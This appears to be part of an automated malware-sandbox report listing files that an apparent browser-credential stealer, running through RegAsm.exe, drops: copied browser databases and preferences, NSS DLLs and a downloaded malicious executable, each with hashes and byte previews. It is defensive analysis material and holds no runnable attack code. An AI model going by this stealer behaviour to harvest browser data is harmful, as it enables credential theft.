SHA-256:	55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
SHA-512:	EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECBGHCGCBKFI\CFBAKK

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136471148832945
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
MD5:	37B1FC046E4B29468721F797A2BB968D
SHA1:	50055EF1C50E4C1A7CCF7D00620E95128E4C448B
SHA-256:	7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
SHA-512:	1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECBGHCGCBKFI\FBGCAA

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECBGHCGCBKFI\FBKECF

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECBGHCGCBKFI\FBKECF-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECBGHCGCBKFI\GCGDHJ

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8745947603342119
Encrypted:	false
SSDEEP:	96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
MD5:	378391FDB591852E472D99DC4BF837DA
SHA1:	10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
SHA-256:	513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
SHA-512:	F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECBGHCGCBKFI\IJKFII

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with very long lines (1717), with CRLF line terminators
Category:	dropped
Size (bytes):	10237
Entropy (8bit):	5.498288591230544
Encrypted:	false
SSDEEP:	192:/nTFTRRFYbBp6SLZNMGaXU6qU4rzy+/3/OYiNBw8D7Sl:LreDFNMroyrdw60
MD5:	0F58C61DE9618A1B53735181E43EE166
SHA1:	CC45931CF12AF92935A84C2A015786CC810AEC3A
SHA-256:	AE9C3109DD23F391DC58C564080932100F55C8E674176D7911D54FB0D3417AE0
SHA-512:	DEA527C22D4AA607B00FBBCC1CDD9C6B69E92EC3B1B14649A086E87258AAD5C280BFB2835C165176E8759F575AA39D1B58E25CB40F60C7E88D94243A874B71BE
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\ECBGHCGCBKFI\JDAFBK

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECBGHCGCBKFI\JKECGH

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.0357803477377646
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
MD5:	76D181A334D47872CD2E37135CC83F95
SHA1:	B563370B023073CE6E0F63671AA4AF169ABBF4E1
SHA-256:	52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
SHA-512:	23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECBGHCGCBKFI\JKECGH-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECBGHCGCBKFI\KKJDGD

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1239949490932863
Encrypted:	false
SSDEEP:	384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:	271D5F995996735B01672CF227C81C17
SHA1:	7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:	62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GIJEGDAKEH.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	413224
Entropy (8bit):	7.989371105778008
Encrypted:	false
SSDEEP:	12288:WFVCXJfc+aP2LQB0g7YUsKEJGxhimXJEO:MCX2d+LQqbKEJQim5t
MD5:	F73186DF5A030CF7F186B0737C3AF1F7
SHA1:	D15E45FEEFBBC010DB92AE897D80BC7419C0D046
SHA-256:	05C67A9765FE1EBEBCEDAEE376F87A803D7CD37E6C5C19F7D336C2F14A4EF207
SHA-512:	A6E4D6E34748FA8FB9153E2104CF49CC36AF9B22E29C8DF050DE0DB4E14E9DD18ED178B4BBACD6289A0A55B465C996FB931799BA970DFE559C85215DB7E31DF1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................><... ...@....@.. ....................................`..................................;..S....@...............(..(&...`.......:............................................... ............... ..H............text...D.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......&..............@..B................ <......H..........0...............................................................^.8=..Q..v A.3[R.J.._....f..9.\l..vC#SsnB~.E..~.i..7.}+.V...#..8..f.#XW....b...(..............<O.......1.$.=UN8.)..LL....(K....,r.....%9.L.Y.=0..T4.&.....d....(U....'="...(>.d..+..92...p8.1..Pa\q....]X./a.@0C.PQ...B...v..6....le2....4I3.......P.C:...v.}.Q.wp..S(A.Qg.'..N.._X.mvg...J/J6.^...D^MI.O4.5.+....e...^.DIf?.1$;7..x...M..q.q.{'...I..CN.n...a.P.8....!0..\.^.'...3.._....,\

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BGDGHJEHJJ.exe.log

Download File

Process:	C:\ProgramData\BGDGHJEHJJ.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BKJKEBGDHD.exe.log

Download File

Process:	C:\ProgramData\BKJKEBGDHD.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.345615485833535
Encrypted:	false
SSDEEP:	24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
MD5:	EEEC189088CC5F1F69CEE62A3BE59EA2
SHA1:	250F25CE24458FC0C581FDDF59FAA26D557844C5
SHA-256:	5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
SHA-512:	2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GIJEGDAKEH.exe.log

Download File

Process:	C:\ProgramData\GIJEGDAKEH.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66f5db9e54794_vfkagks[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	413224
Entropy (8bit):	7.989371105778008
Encrypted:	false
SSDEEP:	12288:WFVCXJfc+aP2LQB0g7YUsKEJGxhimXJEO:MCX2d+LQqbKEJQim5t
MD5:	F73186DF5A030CF7F186B0737C3AF1F7
SHA1:	D15E45FEEFBBC010DB92AE897D80BC7419C0D046
SHA-256:	05C67A9765FE1EBEBCEDAEE376F87A803D7CD37E6C5C19F7D336C2F14A4EF207
SHA-512:	A6E4D6E34748FA8FB9153E2104CF49CC36AF9B22E29C8DF050DE0DB4E14E9DD18ED178B4BBACD6289A0A55B465C996FB931799BA970DFE559C85215DB7E31DF1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................><... ...@....@.. ....................................`..................................;..S....@...............(..(&...`.......:............................................... ............... ..H............text...D.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......&..............@..B................ <......H..........0...............................................................^.8=..Q..v A.3[R.J.._....f..9.\l..vC#SsnB~.E..~.i..7.}+.V...#..8..f.#XW....b...(..............<O.......1.$.=UN8.)..LL....(K....,r.....%9.L.Y.=0..T4.&.....d....(U....'="...(>.d..+..92...p8.1..Pa\q....]X./a.@0C.PQ...B...v..6....le2....4I3.......P.C:...v.}.Q.wp..S(A.Qg.'..N.._X.mvg...J/J6.^...D^MI.O4.5.+....e...^.DIf?.1$;7..x...M..q.q.{'...I..CN.n...a.P.8....!0..\.^.'...3.._....,\

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66f5dbaca34ac_lfdnsafnds[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
